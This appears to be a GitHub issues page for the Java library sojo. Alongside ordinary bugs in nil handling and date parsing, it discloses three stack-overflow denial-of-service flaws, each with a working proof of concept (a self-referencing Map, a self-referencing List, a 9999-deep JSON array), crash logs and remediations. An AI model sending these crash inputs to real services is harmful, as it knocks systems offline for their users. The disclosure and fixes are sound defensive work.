sojo's Issues

ex:nil - returns the next value available instead of NULL or EMPTY

For parameters with an ex:nil value, the value is replaced with the next available key value.

XmlRpcContentHandler.java
    else if (lvCurrentStackObj instanceof Map) {
        Map<Object, Object> lvMap = (Map<Object, Object>) lvCurrentStackObj;
        lvMap.put(pvName, pvValue);
        if ("key".equals(pvName)) {
            for (Map.Entry<?, Object> lvEntry : lvMap.entrySet()) {
                if (lvEntry.getValue() == null) {
                    lvEntry.setValue(pvValue); // ---> this replaces the null value with the next available value.
                }
            }
        }
        lvMap.remove("key");

Stack overflow error caused by sojo serialization Map

Description

sojo before v1.1.1 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleControlCharacter(JsonWalkerInterceptor.java:114)
	at net.sf.sojo.interchange.json.JsonWalkerInterceptor.handleJsonValue(JsonWalkerInterceptor.java:181)
	at net.sf.sojo.interchange.json.JsonWalkerInterceptor.visitElement(JsonWalkerInterceptor.java:214)
	at net.sf.sojo.common.ObjectGraphWalker.fireVisitElementEvent(ObjectGraphWalker.java:80)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:139)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)
	at net.sf.sojo.common.ObjectGraphWalker.mapWalker(ObjectGraphWalker.java:201)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:144)


PoC

<dependency>
    <groupId>net.sf.sojo</groupId>
    <artifactId>sojo</artifactId>
    <version>1.1.1</version>
</dependency>

import net.sf.sojo.interchange.json.JsonSerializer;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        // A map that contains itself: the object graph has a cycle, so the
        // serializer's recursive map walk never reaches a leaf.
        HashMap<String, Object> map = new HashMap<>();
        map.put("t", map);
        JsonSerializer jsonSerializer = new JsonSerializer();
        jsonSerializer.serialize(map); // StackOverflowError (see error log above)
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)

References

  1. jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files

Replace Vector

I think it would be good to replace all references to Vector (which is deprecated) with List (or ArrayList).

SOJO Date Formatting

Hi Martin,

I've tried to compile SOJO and I'm getting date-time formatting exceptions all over the show. For example, one such case is as follows:

testString2Date(test.net.sf.sojo.util.UtilTest)  Time elapsed: 0.007 sec  <<< ERROR!
java.lang.IllegalStateException: The String: "Mon Dec 19 14:18:03 SAST 2011" is not valid date.
    at net.sf.sojo.util.Util.string2Date(Util.java:178)
    at test.net.sf.sojo.util.UtilTest.testString2Date(UtilTest.java:35)

I suspect it is because the Util class (in net.sf.sojo.util) specifically adds the following formats in a static initializer block:

static {
    addDateFormat2List(new SimpleDateFormat("EEE MMM dd HH:mm:ss 'CEST' yyyy", Locale.ENGLISH));
    addDateFormat2List(new SimpleDateFormat("EEE MMM dd HH:mm:ss 'CET' yyyy", Locale.ENGLISH));
    addDateFormat2List(new SimpleDateFormat("yyyy-MM-dd"));
    addDateFormat2List(DateFormat.getDateInstance(DateFormat.MEDIUM));
}

which will only cater for CEST and CET dates. This will obviously cause an issue for people in other time zones. I will try to see if this can be fixed.

Regards,

Wiehann
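
An added example of the failure mode Wiehann describes (example code, not sojo's Util class): it formats a constructed instant the way Date.toString() does, in the Africa/Johannesburg zone so the string carries the SAST abbreviation from the report, and then tries to parse it back with two patterns: one that hardcodes a zone literal like the entries in the static initializer quoted above, and one that uses the zzz zone field, which accepts whatever zone abbreviation the JVM itself emitted. The epoch value and zone choice are constructed for the demonstration.

```java
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Locale;
import java.util.TimeZone;

public class DateZoneParsing {

    // Literal zone name, as in the static initializer quoted above: only
    // strings that spell out "CET" can ever match this pattern.
    static final String CET_ONLY = "EEE MMM dd HH:mm:ss 'CET' yyyy";

    // Generic zone field: 'z' parses any short zone name the JVM knows
    // (CET, CEST, SAST, PST, ...) as well as GMT+hh:mm offsets, so it
    // covers Date.toString() output produced in any default time zone.
    static final String ANY_ZONE = "EEE MMM dd HH:mm:ss zzz yyyy";

    /** Returns the parsed Date, or null when the pattern rejects the string. */
    static Date tryParse(String pattern, String text) {
        SimpleDateFormat fmt = new SimpleDateFormat(pattern, Locale.ENGLISH);
        try {
            return fmt.parse(text);
        } catch (ParseException e) {
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed input: run in the reporter's zone so Date.toString()
        // produces a string with the SAST abbreviation instead of CET/CEST.
        TimeZone.setDefault(TimeZone.getTimeZone("Africa/Johannesburg"));
        Date original = new Date(1324297083000L); // 2011-12-19 12:18:03 UTC
        String text = original.toString();

        System.out.println("Date.toString(): " + text);
        System.out.println("literal 'CET':   " + tryParse(CET_ONLY, text));
        System.out.println("generic zzz:     " + tryParse(ANY_ZONE, text));
    }
}
```

The literal pattern fails as soon as the JVM runs outside the zone it names; the zzz pattern reads the zone from the string using the JVM's own zone table, which is what Date.toString() used to write it, so the round trip does not depend on where the tests are run.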

Stack overflow error caused by sojo serialization List

Description

sojo before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at net.sf.sojo.common.ObjectGraphWalker.fireVisitIterateableElement(ObjectGraphWalker.java:89)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:175)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)


PoC

<dependency>
    <groupId>net.sf.sojo</groupId>
    <artifactId>sojo</artifactId>
    <version>1.1.1</version>
</dependency>

import net.sf.sojo.interchange.json.JsonSerializer;

import java.util.ArrayList;

public class PoC3 {

    public static void main(String[] args) {
        // A list whose only element is the list itself: the serializer's
        // recursive iterator walk descends into the same list forever.
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JsonSerializer jsonSerializer = new JsonSerializer();
        jsonSerializer.serialize(list); // StackOverflowError (see error log above)
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)

References

  1. jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files

Stack overflow error caused by sojo parsing of untrusted JSON String

Description

Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)

PoC

<dependency>
    <groupId>net.sf.sojo</groupId>
    <artifactId>sojo</artifactId>
    <version>1.1.1</version>
</dependency>

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    // 9999 nested arrays "[ [ [ ... 0 ... ] ] ]": every level costs one
    // frame in the generated recursive-descent parser, far more than a
    // default thread stack holds.
    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");

    // Builds `open` repeated `nesting` times, then `content`, then `close`
    // repeated `nesting` times, inserting a newline every 32 brackets so the
    // document stays readable.
    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString); // StackOverflowError (see error log above)
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)
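
The two approaches listed in the Rectification Solution of this issue and of the two serialization issues above (a depth counter with a threshold, and an explicit stack instead of recursion) are shown together below as an added example. This is not sojo's code and not the jackson-databind or Gson patches referenced; it is a stand-alone guard a caller can run on untrusted data before handing it to JsonSerializer or JsonParser. The 1000 threshold is an assumed value, and the inputs in main are constructed to mirror the three PoCs: the self-referencing map, the self-referencing list and the 9999-deep array document.

```java
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Deque;
import java.util.HashMap;
import java.util.IdentityHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.function.IntSupplier;

// Added example, not sojo's code: the two mitigations from the
// "Rectification Solution" lists, as guards run before JsonSerializer/JsonParser.
public final class NestingGuard {

    // Assumed threshold; choose one that legitimate payloads never reach.
    public static final int MAX_DEPTH = 1000;

    // Mitigation 1 (depth counter): walk Maps and Collections as a serializer
    // would and fail once the depth passes maxDepth. An identity set of the nodes
    // on the current path also reports the PoCs' self-reference as a cycle at depth 1.
    public static int checkObjectGraph(Object root, int maxDepth) {
        Set<Object> onPath = Collections.newSetFromMap(new IdentityHashMap<>());
        return walk(root, 0, maxDepth, onPath);
    }

    private static int walk(Object node, int depth, int maxDepth, Set<Object> onPath) {
        if (depth > maxDepth) throw new IllegalStateException("nesting depth exceeds " + maxDepth);
        Iterable<?> children;
        if (node instanceof Map) {
            children = ((Map<?, ?>) node).values();
        } else if (node instanceof Collection) {
            children = (Collection<?>) node;
        } else {
            return depth; // leaf: null, String, Number, Boolean, ...
        }
        if (!onPath.add(node)) throw new IllegalStateException("cyclic reference at depth " + depth);
        int deepest = depth;
        for (Object child : children) {
            deepest = Math.max(deepest, walk(child, depth + 1, maxDepth, onPath));
        }
        onPath.remove(node); // the same object may legitimately appear on two different branches
        return deepest;
    }

    // Mitigation 2 (no recursion): scan JSON text with an explicit stack instead
    // of recursive descent and reject it once bracket nesting passes maxDepth.
    // String literals (with escapes) are skipped so brackets inside strings are
    // not counted. Returns the deepest nesting level seen.
    public static int checkJsonNesting(String json, int maxDepth) {
        Deque<Character> open = new ArrayDeque<>();
        int deepest = 0;
        boolean inString = false;
        for (int i = 0; i < json.length(); i++) {
            char c = json.charAt(i);
            if (inString) {
                if (c == '\\') i++;                  // skip the escaped character
                else if (c == '"') inString = false;
            } else if (c == '"') {
                inString = true;
            } else if (c == '[' || c == '{') {
                open.push(c);
                if (open.size() > maxDepth) throw new IllegalStateException("JSON nesting exceeds " + maxDepth + " at offset " + i);
                deepest = Math.max(deepest, open.size());
            } else if (c == ']' || c == '}') {
                char expected = (c == ']') ? '[' : '{';
                if (open.isEmpty() || open.pop() != expected) throw new IllegalArgumentException("unbalanced bracket at offset " + i);
            }
        }
        if (!open.isEmpty()) throw new IllegalArgumentException("unclosed brackets: " + open.size());
        return deepest;
    }

    private static void report(String label, IntSupplier check) {
        try {
            System.out.println(label + ": ok, depth " + check.getAsInt());
        } catch (RuntimeException e) {
            System.out.println(label + ": rejected, " + e.getMessage());
        }
    }

    public static void main(String[] args) {
        // Constructed inputs mirroring the three PoCs above.
        Map<String, Object> selfMap = new HashMap<>();
        selfMap.put("t", selfMap);
        List<Object> selfList = new ArrayList<>();
        selfList.add(selfList);
        StringBuilder deep = new StringBuilder();
        for (int i = 0; i < 9999; i++) deep.append("[ ");
        deep.append('0');
        for (int i = 0; i < 9999; i++) deep.append("] ");

        report("self-referencing map ", () -> checkObjectGraph(selfMap, MAX_DEPTH));
        report("self-referencing list", () -> checkObjectGraph(selfList, MAX_DEPTH));
        report("9999 nested arrays   ", () -> checkJsonNesting(deep.toString(), MAX_DEPTH));
        report("ordinary document    ", () -> checkJsonNesting("{\"a\":[1,[2,\"[[[\"]]}", MAX_DEPTH));
    }
}
```

The depth counter alone would still recurse maxDepth frames before rejecting a self-referencing Map or List, which is why the walker also keeps an identity set of the objects on the current path; the bracket scan needs no recursion at all, so its cost is bounded by the input length whatever the nesting, and it can sit in front of a parser that has no depth limit of its own.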
